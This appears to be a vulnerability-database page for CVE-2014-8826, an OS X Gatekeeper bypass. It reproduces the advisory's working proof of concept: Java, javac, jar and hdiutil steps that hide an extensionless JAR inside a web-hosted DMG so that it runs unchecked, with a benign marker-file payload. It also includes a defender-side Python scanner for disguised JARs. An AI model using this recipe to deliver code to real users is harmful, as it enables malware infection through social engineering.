| Title | Published | Views | Family |
|---|---|---|---|
| OS X < 10.10.x - Gatekeeper bypass Vulnerability | 29 Jan 2015 00:00 | – | zdt |
| Mac OS X < 10.10.2 Multiple Vulnerabilities | 4 Mar 2015 00:00 | – | nessus |
| Mac OS X 10.10.x < 10.10.2 Multiple Vulnerabilities (POODLE) | 29 Jan 2015 00:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Update 2015-001) (POODLE) | 29 Jan 2015 00:00 | – | nessus |
| Apple Mac OS X Gatekeeper Protection Security Bypass Vulnerability | 29 Jan 2015 00:00 | – | cnvd |
| CVE-2014-8826 | 30 Jan 2015 11:00 | – | cve |
| CVE-2014-8826 | 30 Jan 2015 11:00 | – | cvelist |
| Apple Mac OSX < 10.10.x - GateKeeper Bypass | 29 Jan 2015 00:00 | – | exploitdb |
| Apple Mac OSX 10.10.x - GateKeeper Bypass | 29 Jan 2015 00:00 | – | exploitpack |
| Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability | 19 Dec 2022 18:00 | – | mmpc |
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:

- Create a JAR file containing the code to be executed. For example, file AmpliaTest.java:

  ```java
  public class AmpliaTest {
      public static void main(String[] args) {
          try {
              // Proof-of-concept payload from the advisory: it only creates a marker file
              Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
          } catch (Exception e) {
          }
      }
  }
  ```

  (This is just an example; of course, arbitrary code can be executed.)

  ```sh
  $ javac AmpliaTest.java
  ```

  Be sure to compile the code for a version of Java lower than or equal to the one available on the target (for example, `javac -target 1.6 -source 1.6 AmpliaTest.java`; the compiled code will then work on Java versions >= 1.6).

  ```sh
  $ echo "main-class: AmpliaTest" > Manifest
  $ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
  ```

- Create a .DMG disk image. For example:

  ```sh
  $ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
  ```

- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-click on 'UnsignedCode' and the code will be executed, bypassing OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).

(Perform the same steps but without removing the .jar extension from UnsignedCode.jar, and OS X Gatekeeper will prevent execution of the JAR file.)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).
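As an added, defender-side example that is not part of the advisory: a small Python scanner that decides whether a file is an executable JAR from its content (ZIP container plus a manifest `Main-Class` entry) rather than from its name, so the extensionless 'UnsignedCode' disguise described above is still caught when scanning a mounted image or a downloads folder. The sample volume it builds is constructed for the demonstration and the class file inside it is a stub, not real bytecode.

```python
import io
import os
import tempfile
import zipfile

def jar_main_class(path):
    """Return the manifest's Main-Class, or None if the file is not a JAR
    with an entry point. Only content is inspected, never the extension."""
    if not zipfile.is_zipfile(path):
        return None
    try:
        with zipfile.ZipFile(path) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return None
    for line in manifest.splitlines():
        name, sep, value = line.partition(":")
        # Attribute names are case-insensitive, so the advisory's lower-case
        # "main-class:" line is honoured by Java and must be matched here too.
        if sep and name.strip().lower() == "main-class":
            return value.strip()
    return None

def find_disguised_jars(directory):
    """List executable JARs under directory whose name lacks a .jar
    extension, i.e. files that Finder would show with the blank icon."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if not name.lower().endswith(".jar") and jar_main_class(path):
                hits.append(path)
    return sorted(hits)

def build_sample_volume():
    """Constructed sample mirroring the advisory's disk image: the JAR with
    and without its extension, plus a plain text file that is not a JAR."""
    vol = tempfile.mkdtemp(prefix="AmpliaSecurity-")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nmain-class: AmpliaTest\r\n")
        zf.writestr("AmpliaTest.class", b"\xca\xfe\xba\xbe")  # stub, not real bytecode
    for name in ("UnsignedCode", "UnsignedCode.jar"):
        with open(os.path.join(vol, name), "wb") as fh:
            fh.write(buf.getvalue())
    with open(os.path.join(vol, "README.txt"), "w") as fh:
        fh.write("not a jar\n")
    return vol
```

Running `find_disguised_jars(build_sample_volume())` reports only the extensionless copy; the same check could be applied to every file on a freshly mounted .DMG before the user is allowed to open anything.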